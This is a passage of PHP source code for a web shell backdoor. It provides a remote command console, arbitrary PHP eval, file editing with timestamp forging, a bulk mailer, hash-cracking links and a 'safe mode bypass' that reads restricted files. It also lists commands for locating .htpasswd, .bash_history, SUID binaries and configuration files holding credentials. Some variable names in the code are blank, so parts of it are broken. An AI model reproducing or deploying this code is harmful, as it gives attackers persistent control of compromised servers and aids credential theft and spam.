['<font ', '</font>'],
$oRb
) . '</div>';
}
break;
case 'chmod':
if (!empty($_POST['p3'])) {
$perms = 0;
for ($i = strlen($_POST['p3']) - 1; $i >= 0; --$i) {
$perms +=
(int) $_POST['p3'][$i] *
pow(8, strlen($_POST['p3']) - $i - 1);
}
if (!@chmod($_POST['p1'], $perms)) {
echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
}
}
clearstatcache();
echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' .
urlencode($_POST['p1']) .
'\',null,this.chmod.value);return false;"><input type=text name=chmod value="' .
substr(sprintf('%o', fileperms($_POST['p1'])), -4) .
'"><input type=submit value="submit"></form>';
break;
case 'edit':
if (!is_writable($_POST['p1'])) {
echo 'File isn\'t writeable';
break;
}
if (!empty($_POST['p3'])) {
$time = @filemtime($_POST['p1']);
$_POST['p3'] = substr($_POST['p3'], 1);
$fp = @fopen($_POST['p1'], 'w');
if ($fp) {
@fwrite($fp, $_POST['p3']);
@fclose($fp);
echo 'Saved!<br><script>p3_="";</script>';
@touch($_POST['p1'], $time, $time);
}
}
echo '<form onsubmit="g(null,null,\'' .
urlencode($_POST['p1']) .
'\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
echo '</textarea><input type=submit value="submit"></form>';
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = ['00000000<br>', '', ''];
$len = strlen($c);
for ($i = 0; $i < $len; ++$i) {
$h[1] .= sprintf('%02X', ord($c[$i])) . ' ';
switch (ord($c[$i])) {
case 0:
$h[2] .= ' ';
break;
case 9:
$h[2] .= ' ';
break;
case 10:
$h[2] .= ' ';
break;
case 13:
$h[2] .= ' ';
break;
default:
$h[2] .= $c[$i];
break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i + 1 < $len) {
$h[0] .= sprintf('%08X', $i + 1) . '<br>';
}
$h[1] .= '<br>';
$h[2] .= "
";
}
}
echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>' .
$h[0] .
'</pre></span></td><td bgcolor=#060a10><pre>' .
$h[1] .
'</pre></td><td bgcolor=#202832><pre>' .
htmlspecialchars($h[2]) .
'</pre></td></tr></table>';
break;
case 'rename':
if (!empty($_POST['p3'])) {
if (!@rename($_POST['p1'], $_POST['p3'])) {
echo 'Can\'t rename!<br>';
} else {
die(
'<script>g(null,null,"' .
urlencode($_POST['p3']) .
'",null,"")</script>'
);
}
}
echo '<form onsubmit="g(null,null,\'' .
urlencode($_POST['p1']) .
'\',null,this.name.value);return false;"><input type=text name=name value="' .
htmlspecialchars($_POST['p1']) .
'"><input type=submit value="submit"></form>';
break;
case 'touch':
if (!empty($_POST['p3'])) {
$time = strtotime($_POST['p3']);
if ($time) {
if (!touch($_POST['p1'], $time, $time)) {
echo 'Fail!';
} else {
echo 'Touched!';
}
} else {
echo 'Bad time format!';
}
}
clearstatcache();
echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' .
urlencode($_POST['p1']) .
'\',null,this.touch.value);return false;"><input type=text name=touch value="' .
date('Y-m-d H:i:s', @filemtime($_POST['p1'])) .
'"><input type=submit value="submit"></form>';
break;
/* () 12.2015 mitryz */
case 'frame':
$frameSrc = substr(
htmlspecialchars($GLOBALS['cwd']),
strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT']))
);
if ($frameSrc[0] != '/') {
$frameSrc = '/' . $frameSrc;
}
if ($frameSrc[strlen($frameSrc) - 1] != '/') {
$frameSrc = $frameSrc . '/';
}
$frameSrc = $frameSrc . htmlspecialchars($_POST['p1']);
echo '<iframe width="100%" height="900px" scrolling="no" src=' .
$frameSrc .
' onload="onload=height=contentDocument.body.scrollHeight"></iframe>';
break;
}
echo '</div>';
hardFooter();
}
if ($os == 'win') {
$aliases = [
'List Directory' => 'dir',
'Find index.php in current dir' => 'dir /s /w /b index.php',
'Find *config*.php in current dir' => 'dir /s /w /b *config*.php',
'Show active connections' => 'netstat -an',
'Show running services' => 'net start',
'User accounts' => 'net user',
'Show computers' => 'net view',
'ARP Table' => 'arp -a',
'IP Configuration' => 'ipconfig /all',
];
} else {
$aliases = [
'List dir' => 'ls -lha',
'list file attributes on a Linux second extended file system' =>
'lsattr -va',
'show opened ports' => 'netstat -an | grep -i listen',
'process status' => 'ps aux',
'Find' => '',
'find all suid files' => 'find / -type f -perm -04000 -ls',
'find suid files in current dir' => 'find . -type f -perm -04000 -ls',
'find all sgid files' => 'find / -type f -perm -02000 -ls',
'find sgid files in current dir' => 'find . -type f -perm -02000 -ls',
'find config.inc.php files' => 'find / -type f -name config.inc.php',
'find config* files' => "find / -type f -name \"config*\"",
'find config* files in current dir' =>
"find . -type f -name \"config*\"",
'find all writable folders and files' => 'find / -perm -2 -ls',
'find all writable folders and files in current dir' =>
'find . -perm -2 -ls',
'find all service.pwd files' => 'find / -type f -name service.pwd',
'find service.pwd files in current dir' =>
'find . -type f -name service.pwd',
'find all .htpasswd files' => 'find / -type f -name .htpasswd',
'find .htpasswd files in current dir' =>
'find . -type f -name .htpasswd',
'find all .bash_history files' => 'find / -type f -name .bash_history',
'find .bash_history files in current dir' =>
'find . -type f -name .bash_history',
'find all .fetchmailrc files' => 'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir' =>
'find . -type f -name .fetchmailrc',
'Locate' => '',
'locate httpd.conf files' => 'locate httpd.conf',
'locate vhosts.conf files' => 'locate vhosts.conf',
'locate proftpd.conf files' => 'locate proftpd.conf',
'locate psybnc.conf files' => 'locate psybnc.conf',
'locate my.conf files' => 'locate my.conf',
'locate admin.php files' => 'locate admin.php',
'locate cfg.php files' => 'locate cfg.php',
'locate conf.php files' => 'locate conf.php',
'locate config.dat files' => 'locate config.dat',
'locate config.php files' => 'locate config.php',
'locate config.inc files' => 'locate config.inc',
'locate config.inc.php' => 'locate config.inc.php',
'locate config.default.php files' => 'locate config.default.php',
'locate config* files ' => 'locate config',
'locate .conf files' => "locate '.conf'",
'locate .pwd files' => "locate '.pwd'",
'locate .sql files' => "locate '.sql'",
'locate .htpasswd files' => "locate '.htpasswd'",
'locate .bash_history files' => "locate '.bash_history'",
'locate .mysql_history files' => "locate '.mysql_history'",
'locate .fetchmailrc files' => "locate '.fetchmailrc'",
'locate backup files' => 'locate backup',
'locate dump files' => 'locate dump',
'locate priv files' => 'locate priv',
];
}
function actionConsole()
{
if (!empty($_POST['p1']) && !empty($_POST['p2'])) {
prototype(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true);
$_POST['p1'] .= ' 2>&1';
} elseif (!empty($_POST['p1'])) {
prototype(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0);
}
if (isset($_POST['ajax'])) {
prototype(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
ob_start();
echo "d.cf.cmd.value='';
";
$temp = @iconv(
$_POST['charset'],
'UTF-8',
addcslashes(
"
$ " . $_POST['p1'] . "
" . ex($_POST['p1']),
"
\'"
)
);
if (preg_match('!.*cd\s+([^;]+)$!', $_POST['p1'], $match)) {
if (@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "c_='" . $GLOBALS['cwd'] . "';";
}
}
echo "d.cf.output.value+='" . $temp . "';";
echo 'd.cf.output.scrollTop = d.cf.output.scrollHeight;';
$temp = ob_get_clean();
echo strlen($temp), "
", $temp;
exit();
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
prototype(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
}
hardHeader();
echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur--;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push('');
cur = cmds.length-1;
}
</script>";
echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><label><select name=alias>';
foreach ($GLOBALS['aliases'] as $n => $v) {
if ($v == '') {
echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
continue;
}
echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>';
}
echo '</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 ' .
(@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') .
'> send using AJAX <input type=checkbox name=show_errors value=1 ' .
(!empty($_POST['p2']) ||
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out']
? 'checked'
: '') .
'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class="bigarea output-result" name=output style="border-bottom:0;margin-top:5px;" readonly>';
if (!empty($_POST['p1'])) {
echo htmlspecialchars('$ ' . $_POST['p1'] . "
" . ex($_POST['p1']));
}
echo '</textarea><p style="font-weight: bold;
color: #fff;
font-size: 15px;
">cmd:</p><input placeholder="type here ..." type=text name=cmd style="width:100%;padding:20px" onkeydown="kp(event);"><br/><br/>';
echo '</form></div><script>d.cf.cmd.focus();</script>';
hardFooter();
}
function actionSendMail()
{
hardHeader();
echo '<h1>Send Mail</h1><div class=content>
<form class="send_mail_form" name=pf method=post>
<input type=hidden name=c value="' .
htmlspecialchars($GLOBALS['cwd']) .
'">' .
'<input type=hidden name=a value="' .
htmlspecialchars($_POST['a']) .
'">' .
'<input type=hidden name=charset value="' .
htmlspecialchars($_POST['charset']) .
'">' .
'<input type=hidden name=ne value="">
<input type=hidden name=p3 value="">
<input type=hidden name=p2 value="">
<input type=hidden name=p1 value="">
<div><label>Subject</label> <input required type="text" name="subject"/></div><br/>
<div><label>From Name</label> <input required type="text" name="name"/></div><br/>
<div><label>Sender</label> <input required type="text" name="sender"/></div><br/>
<div><label>Mail List</label> <br/><textarea required name="maillist"></textarea></div><br/>
<div><label>Message</label> <br/><textarea required name="message"></textarea></div><br/>
<div><label>message type:</label>
<label for="html">Html</label> <input style="height:unset" required type="radio" value="html" id="html" name="type"/>
<label for="simple">Simple text</label> <input style="height:unset" required type="radio" checked value="simple" id="simple" name="type"/></div><br/>
' .
(!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') .
'</textarea><input type=submit value=Send style="margin-top:5px">';
if (isset($_POST['subject'])) {
$maillist = explode("
", $_POST['maillist']);
$to = implode(',', $maillist);
$subject = $_POST['subject'];
$message = $_POST['message'];
$headers = 'MIME-Version: 1.0' . "
";
if ($_POST['type'] === 'html') {
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "
";
}
$headers =
'From: ' .
$_POST['name'] .
' <' .
$_POST['sender'] .
'>' .
PHP_EOL .
'Reply-To:' .
$_POST['name'] .
' <' .
$_POST['sender'] .
'>' .
PHP_EOL .
'X-Mailer: PHP/' .
phpversion();
if (mail($to, $subject, $message, $headers)) {
echo '<pre>Email sent successfully</pre>';
} else {
echo '<pre>Email sent faild</pre>';
}
}
}
function actionPhp()
{
if (isset($_POST['ajax'])) {
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
ob_start();
eval($_POST['p1']);
$temp =
"document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" .
addcslashes(htmlspecialchars(ob_get_clean()), "
\'") .
"';
";
echo strlen($temp), "
", $temp;
exit();
}
hardHeader();
if (isset($_POST['p2']) && $_POST['p2'] == 'info') {
echo '<h1>PHP info</h1><div class=content>';
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace('!body {.*}!msiU', '', $tmp);
$tmp = preg_replace('!a:\w+ {.*}!msiU', '', $tmp);
$tmp = preg_replace('!h1!msiU', 'h2', $tmp);
$tmp = preg_replace(
'!td, th {(.*)}!msiU',
'.e, .v, .h, .h th {$1}',
$tmp
);
$tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU', '', $tmp);
echo $tmp;
echo '</div><br>';
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
}
echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' .
(!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') .
'</textarea><input type=submit value=Eval style="margin-top:5px">';
echo ' <input type=checkbox name=ajax value=1 ' .
($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') .
'> send using AJAX</form><pre id=PhpOutput style="' .
(empty($_POST['p1']) ? 'display:none;' : '') .
'margin-top:5px;" class=ml1>';
if (!empty($_POST['p1'])) {
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo '</pre></div>';
hardFooter();
}
function actionFilesMan()
{
if (!empty($_COOKIE['f'])) {
$_COOKIE['f'] = @unserialize($_COOKIE['f']);
}
if (!empty($_POST['p1'])) {
switch ($_POST['p1']) {
case 'uploadFile':
if (is_array($_FILES['f']['tmp_name'])) {
foreach ($_FILES['f']['tmp_name'] as $i => $tmpName) {
if (
!@move_uploaded_file(
$tmpName,
$_FILES['f']['name'][$i]
)
) {
echo "Can't upload file!";
}
}
}
break;
case 'mkdir':
if (!@mkdir($_POST['p2'])) {
echo "Can't create new dir";
}
break;
case 'delete':
function deleteDir($path)
{
$path = substr($path, -1) == '/' ? $path : $path . '/';
$dh = opendir($path);
while (($ = readdir($dh)) !== false) {
$ = $path . $;
if (basename($) == '..' || basename($) == '.') {
continue;
}
$type = filetype($);
if ($type == 'dir') {
deleteDir($);
} else {
@unlink($);
}
}
closedir($dh);
@rmdir($path);
}
if (is_array(@$_POST['f'])) {
foreach ($_POST['f'] as $f) {
if ($f == '..') {
continue;
}
$f = urldecode($f);
if (is_dir($f)) {
deleteDir($f);
} else {
@unlink($f);
}
}
}
break;
case 'paste':
if ($_COOKIE['act'] == 'copy') {
function copy_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = @opendir($c . $s);
while (($f = @readdir($h)) !== false) {
if ($f != '.' and $f != '..') {
copy_paste(
$c . $s . '/',
$f,
$d . $s . '/'
);
}
}
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE['f'] as $f) {
copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']);
}
} elseif ($_COOKIE['act'] == 'move') {
function move_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = @opendir($c . $s);
while (($f = @readdir($h)) !== false) {
if ($f != '.' and $f != '..') {
copy_paste(
$c . $s . '/',
$f,
$d . $s . '/'
);
}
}
} elseif (@is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE['f'] as $f) {
@rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f);
}
} elseif ($_COOKIE['act'] == 'zip') {
if (class_exists('ZipArchive')) {
$zip = new ZipArchive();
if ($zip->open($_POST['p2'], ZipArchive::CREATE)) {
chdir($_COOKIE['c']);
foreach ($_COOKIE['f'] as $f) {
if ($f == '..') {
continue;
}
if (@is_file($_COOKIE['c'] . $f)) {
$zip->addFile($_COOKIE['c'] . $f, $f);
} elseif (@is_dir($_COOKIE['c'] . $f)) {
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator(
$f . '/',
FilesystemIterator::SKIP_DOTS
)
);
foreach ($iterator as $key => $value) {
$zip->addFile(realpath($key), $key);
}
}
}
chdir($GLOBALS['cwd']);
$zip->close();
}
}
} elseif ($_COOKIE['act'] == 'unzip') {
if (class_exists('ZipArchive')) {
$zip = new ZipArchive();
foreach ($_COOKIE['f'] as $f) {
if ($zip->open($_COOKIE['c'] . $f)) {
$zip->extractTo($GLOBALS['cwd']);
$zip->close();
}
}
}
} elseif ($_COOKIE['act'] == 'tar') {
chdir($_COOKIE['c']);
$_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
ex(
'tar cfzv ' .
escapeshellarg($_POST['p2']) .
' ' .
implode(' ', $_COOKIE['f'])
);
chdir($GLOBALS['cwd']);
}
unset($_COOKIE['f']);
setcookie('f', '', time() - 3600);
break;
default:
if (!empty($_POST['p1'])) {
prototype('act', $_POST['p1']);
prototype('f', serialize(@$_POST['f']));
prototype('c', @$_POST['c']);
}
break;
}
}
hardHeader();
echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
$dirContent = hardScandir(
isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']
);
if ($dirContent === false) {
echo 'Can\'t open this folder!';
hardFooter();
return;
}
global $sort;
$sort = ['name', 1];
if (!empty($_POST['p1'])) {
if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) {
$sort = [$match[1], (int) $match[2]];
}
}
echo "<script>
function sa() {
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type == 'checkbox')
d.files.elements[i].checked = d.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" .
($sort[1] ? 0 : 1) .
"\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" .
($sort[1] ? 0 : 1) .
"\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" .
($sort[1] ? 0 : 1) .
"\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" .
($sort[1] ? 0 : 1) .
"\")'>Permissions</a></th><th>Actions</th></tr>";
$dirs = $files = [];
$n = count($dirContent);
for ($i = 0; $i < $n; $i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = [
'name' => $dirContent[$i],
'path' => $GLOBALS['cwd'] . $dirContent[$i],
'modify' => date(
'Y-m-d H:i:s',
@filemtime($GLOBALS['cwd'] . $dirContent[$i])
),
'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]),
'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]),
'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i]),
];
if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) {
$files[] = array_merge($tmp, ['type' => 'file']);
} elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) {
$dirs[] = array_merge($tmp, [
'type' => 'link',
'link' => readlink($tmp['path']),
]);
} elseif (
@is_dir($GLOBALS['cwd'] . $dirContent[$i]) &&
$dirContent[$i] != '.'
) {
$dirs[] = array_merge($tmp, ['type' => 'dir']);
}
}
$GLOBALS['sort'] = $sort;
function cmp($a, $b)
{
if ($GLOBALS['sort'][0] != 'size') {
return strcmp(
strtolower($a[$GLOBALS['sort'][0]]),
strtolower($b[$GLOBALS['sort'][0]])
) * ($GLOBALS['sort'][1] ? 1 : -1);
} else {
return ($a['size'] < $b['size'] ? -1 : 1) *
($GLOBALS['sort'][1] ? 1 : -1);
}
}
usort($files, 'cmp');
usort($dirs, 'cmp');
$files = array_merge($dirs, $files);
$l = 0;
foreach ($files as $f) {
echo '<tr' .
($l ? ' class=l1' : '') .
'><td><input type=checkbox name="f[]" value="' .
urlencode($f['name']) .
'" class=chkbx></td><td><a href=# onclick="' .
($f['type'] == 'file'
? 'g(\'FilesTools\',null,\'' .
urlencode($f['name']) .
'\', \'view\')">' .
htmlspecialchars($f['name'])
: 'g(\'FilesMan\',\'' .
$f['path'] .
'\');" ' .
(empty($f['link']) ? '' : "title='{$f['link']}'") .
'><b>[ ' .
htmlspecialchars($f['name']) .
' ]</b>') .
'</a></td><td>' .
($f['type'] == 'file' ? viewSize($f['size']) : $f['type']) .
'</td><td>' .
$f['modify'] .
'</td><td>' .
$f['owner'] .
'/' .
$f['group'] .
'</td><td><a href=# onclick="g(\'FilesTools\',null,\'' .
urlencode($f['name']) .
'\',\'chmod\')">' .
$f['perms'] .
'</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g(\'FilesTools\',null,\'' .
urlencode($f['name']) .
'\', \'rename\')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g(\'FilesTools\',null,\'' .
urlencode($f['name']) .
'\', \'touch\')">T</a>' .
($f['type'] == 'file'
? ' <a class="tooltip" data-tooltip="Frame" href="#" onclick="g(\'FilesTools\',null,\'' .
urlencode($f['name']) .
'\', \'frame\')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g(\'FilesTools\',null,\'' .
urlencode($f['name']) .
'\', \'edit\')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g(\'FilesTools\',null,\'' .
urlencode($f['name']) .
'\', \'download\')">D</a>'
: '') .
'</td></tr>';
$l = $l ? 0 : 1;
}
echo "<tr id=fak><td colspan=7>
<input type=hidden name=ne value=''>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='" .
htmlspecialchars($GLOBALS['cwd']) .
"'>
<input type=hidden name=charset value='" .
(isset($_POST['charset']) ? $_POST['charset'] : '') .
"'>
<label><select name='p1'>";
if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) {
echo "<option value='paste'> Paste</option>";
}
if (class_exists('ZipArchive')) {
echo "<option value='unzip'>Unzip compress</option><option value='zip'> compress</option>";
}
echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
echo "<option value='tar'>zip tar.gz</option>";
echo '</select></label>';
if (
!empty($_COOKIE['act']) &&
@count($_COOKIE['f']) &&
($_COOKIE['act'] == 'zip' || $_COOKIE['act'] == 'tar')
) {
echo " file name: <input type=text name=p2 value='hard_" .
date('Ymd_His') .
'.' .
($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') .
"'> ";
}
echo "<input type='submit' value='submit'></td></tr></form></table></div>";
hardFooter();
}
function actionStringTools()
{
if (!function_exists('hex2bin')) {
function hex2bin($p)
{
return decbin(hexdec($p));
}
}
if (!function_exists('binhex')) {
function binhex($p)
{
return dechex(bindec($p));
}
}
if (!function_exists('hex2ascii')) {
function hex2ascii($p)
{
$r = '';
for ($i = 0; $i < strLen($p); $i += 2) {
$r .= chr(hexdec($p[$i] . $p[$i + 1]));
}
return $r;
}
}
if (!function_exists('ascii2hex')) {
function ascii2hex($p)
{
$r = '';
for ($i = 0; $i < strlen($p); ++$i) {
$r .= sprintf('%02X', ord($p[$i]));
}
return strtoupper($r);
}
}
if (!function_exists('full_urlencode')) {
function full_urlencode($p)
{
$r = '';
for ($i = 0; $i < strlen($p); ++$i) {
$r .= '%' . dechex(ord($p[$i]));
}
return strtoupper($r);
}
}
$stringTools = [
'Base64 encode' => 'base64_encode',
'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'ASCII to HEX' => 'ascii2hex',
'HEX to ASCII' => 'hex2ascii',
'HEX to DEC' => 'hexdec',
'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex',
'DEC to BIN' => 'decbin',
'BIN to HEX' => 'binhex',
'BIN to DEC' => 'bindec',
'String to lower case' => 'strtolower',
'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars',
'String length' => 'strlen',
];
if (isset($_POST['ajax'])) {
prototype(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
ob_start();
if (in_array($_POST['p1'], $stringTools)) {
echo $_POST['p1']($_POST['p2']);
}
$temp =
"document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" .
addcslashes(htmlspecialchars(ob_get_clean()), "
\'") .
"';
";
echo strlen($temp), "
", $temp;
exit();
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
prototype(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
}
hardHeader();
echo '<h1>String conversions</h1><div class=content>';
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><label><select name='selectTool'>";
foreach ($stringTools as $k => $v) {
echo "<option value='" . htmlspecialchars($v) . "'>" . $k . '</option>';
}
echo "</select></label><input type='submit' value='submit'/> <input type=checkbox name=ajax value=1 " .
(@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') .
"> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" .
(empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) .
"</textarea></form><pre class='ml1' style='" .
(empty($_POST['p1']) ? 'display:none;' : '') .
"margin-top:5px' id='strOutput'>";
if (!empty($_POST['p1'])) {
if (in_array($_POST['p1'], $stringTools)) {
echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
}
echo "</pre></div><br><h1>Search files:</h1><div class=content>
<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
<tr><td>Path:</td><td><input type='text' name='cwd' value='" .
htmlspecialchars($GLOBALS['cwd']) .
"' style='width:100%'></td></tr>
<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
<tr><td></td><td><input type='submit' value='submit'></td></tr>
</table></form>";
function hardRecursiveGlob($path)
{
if (substr($path, -1) != '/') {
$path .= '/';
}
$paths = @array_unique(
@array_merge(
@glob($path . $_POST['p3']),
@glob($path . '*', GLOB_ONLYDIR)
)
);
if (is_array($paths) && @count($paths)) {
foreach ($paths as $) {
if (@is_dir($)) {
if ($path != $) {
hardRecursiveGlob($);
}
} else {
if (
empty($_POST['p2']) ||
@strpos(file_get_contents($), $_POST['p2']) !== false
) {
echo "<a href='#' onclick='g(\"FilesTools\",null,\"" .
urlencode($) .
"\", \"view\",\"\")'>" .
htmlspecialchars($) .
'</a><br>';
}
}
}
}
}
if (@$_POST['p3']) {
hardRecursiveGlob($_POST['c']);
}
echo "</div><br><h1>Search for hash:</h1><div class=content>
<form method='post' target='_blank' name='hf'>
<input type='text' name='hash' style='width:200px;'><br>
<input type='hidden' name='act' value='find'/>
<input type='submit' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
<input type='submit' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
<input type='submit' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br>
<input type='submit' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
<input type='submit' value='toolki.com' onclick=\"document.hf.action='http://toolki.com/';document.hf.submit()\"><br>
<input type='submit' value='fopo.com.ar' onclick=\"document.hf.action='http://fopo.com.ar/';document.hf.submit()\"><br>
<input type='submit' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
</form></div>";
hardFooter();
}
function actionSafeMode()
{
$temp = '';
ob_start();
switch ($_POST['p1']) {
case 1:
$temp = @tempnam($test, 'cx');
if (@copy('compress.zlib://' . $_POST['p2'], $temp)) {
echo @file_get_contents($temp);
unlink($temp);
} else {
echo 'Sorry... Can\'t open file';
}
break;
case 2:
$files = glob($_POST['p2'] . '*');
if (is_array($files)) {
foreach ($files as $filename) {
echo $filename . "
";
}
}
break;
case 3:
$ch = curl_init('file://' . $_POST['p2'] . "" . SELF_PATH);
curl_exec($ch);
break;
case 4:
ini_restore('safe_mode');
ini_restore('open_basedir');
include $_POST['p2'];
break;
case 5:
for (; $_POST['p2'] <= $_POST['p3']; $_POST['p2']++) {
$uid = @posix_getpwuid($_POST['p2']);
if ($uid) {
echo join(':', $uid) . "
";
}
}
break;
case 6:
if (!function_exists('imap_open')) {
break;
}
$stream = imap_open($_POST['p2'], '', '');
if ($stream == false) {
break;
}
echo imap_body($stream, 1);
imap_close($stream);
break;
}
$temp = ob_get_clean();
hardHeader();
echo '<h1>Safe mode bypass</h1><div class=content>';
